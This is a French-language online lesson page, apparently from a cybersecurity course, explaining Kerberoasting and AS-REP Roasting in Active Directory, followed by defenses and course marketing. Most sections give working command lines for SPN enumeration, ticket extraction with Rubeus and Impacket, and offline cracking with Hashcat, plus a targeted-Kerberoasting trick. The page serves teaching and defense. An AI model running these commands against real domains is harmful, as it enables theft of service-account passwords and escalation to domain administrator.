Kerberoasting et AS-REP Roasting
Demandez des tickets de service Kerberos et cassez-les hors ligne avec Hashcat.
Kerberoasting et AS-REP Roasting est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Chiffrement des tickets Kerberos
Les tickets de service sont chiffrés avec le hachage du mot de passe du compte de service. Tout utilisateur du domaine peut demander un ticket de service pour n’importe quel SPN. Si le compte de service utilise un mot de passe faible, le ticket peut être craqué hors ligne.
Qu’est-ce que le Kerberoasting ?
Le Kerberoasting demande des tickets de service pour les comptes associés à des noms principaux de service (SPN), extrait le ticket chiffré et le craque hors ligne avec Hashcat. Aucun privilège élevé n’est requis : tout utilisateur du domaine peut effectuer cette opération.
# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with HashcatRecherche de SPN
Énumérez tous les comptes de service associés à des SPN à l’aide de PowerView, d’Impacket ou des outils AD natifs. Les SPN relient les comptes de service à leurs services.
# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com
# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
"(servicePrincipalName=*)" cn servicePrincipalNameDemande et extraction de tickets
Rubeus sous Windows et GetUserSPNs d’Impacket sous Linux demandent tous deux des tickets et les produisent dans un format pouvant être craqué.
# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
-request -outputfile hashes.txtCraquage avec Hashcat
Les hachages Kerberoast utilisent le mode 13100 (Kerberos 5 TGS-REP). Utilisez une liste de mots robuste avec des règles pour une efficacité maximale.
# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
# AES tickets: mode 19700 (AES128) or 19800 (AES256)Qu’est-ce que l’AS-REP Roasting ?
L’AS-REP Roasting cible les comptes pour lesquels l’option Ne pas exiger la pré-authentification Kerberos est activée. L’AS renvoie un TGT chiffré avec le hachage de l’utilisateur — il peut être demandé sans connaître le mot de passe, puis craqué hors ligne.
Recherche des comptes sans pré-authentification
Les comptes sans pré-authentification constituent une erreur de configuration, souvent laissée par d’anciennes applications. Énumérez-les avec PowerView ou GetNPUsers.
# PowerView
Get-DomainUser -PreauthNotRequired
# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
-dc-ip dc.corp.com -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txtCraquage des hachages AS-REP
Les hachages AS-REP utilisent le mode 18200 de Hashcat. Le processus de craquage est le même que pour le Kerberoasting : une attaque par dictionnaire hors ligne contre la réponse AS chiffrée.
# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.ruleÉvaluation de l’impact
Les mots de passe de comptes de service craqués disposent souvent de privilèges élevés : les comptes de service qui exécutent des bases de données, des logiciels de sauvegarde ou Exchange peuvent être des administrateurs de domaine. Les comptes AS-REP sont souvent négligés et insuffisamment sécurisés.
Kerberoasting ciblé
Si vous disposez d’un droit d’écriture sur un objet, vous pouvez ajouter temporairement un SPN à un compte de grande valeur, effectuer un Kerberoasting sur ce compte, craquer le hachage, puis supprimer le SPN — ce qui permet de cibler certains comptes à la demande.
Défenses
Pour se défendre contre le Kerberoasting, utilisez des mots de passe aléatoires longs (25 caractères ou plus) pour les comptes de service ou, mieux encore, utilisez des comptes de service gérés par groupe (gMSA) avec des mots de passe de 120 caractères renouvelés automatiquement. Contre l’AS-REP Roasting, activez la pré-authentification pour tous les comptes.
Vérification rapide
Quel attribut de compte est requis pour que l’AS-REP Roasting fonctionne ?
Résumé : Kerberoasting et AS-REP Roasting
Les deux attaques exploitent les faiblesses du chiffrement des tickets Kerberos pour craquer les mots de passe hors ligne sans déclencher de verrouillage de compte. Le Kerberoasting cible les comptes associés à des SPN (tout utilisateur du domaine peut l’effectuer) ; l’AS-REP Roasting cible les comptes sans pré-authentification (aucun identifiant n’est nécessaire). Défendez-vous avec des gMSA pour les comptes de service et imposez la pré-authentification pour tous les utilisateurs.
Apprends Cyber Security Academy avec un tuteur IA — gratuit
Écris et exécute du vrai code dans ton navigateur, obtiens de l'aide instantanée d'un tuteur IA disponible 24h/24, et reprends là où tu t'es arrêté sur le web ou dans l'app.
- Cours
- 76
- Leçons
- 303
Questions Fréquemment Posées
La leçon « Kerberoasting et AS-REP Roasting » est-elle gratuite ?
Oui — le texte complet de « Kerberoasting et AS-REP Roasting » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Kerberoasting et AS-REP Roasting » ?
Demandez des tickets de service Kerberos et cassez-les hors ligne avec Hashcat. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Kerberoasting et AS-REP Roasting » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Authentification Windows : NTLM et Kerberos
- Attaques Pass-the-Hash et Pass-the-Ticket
- Kerberoasting et AS-REP Roasting
- Renforcement de la sécurité d’Active Directory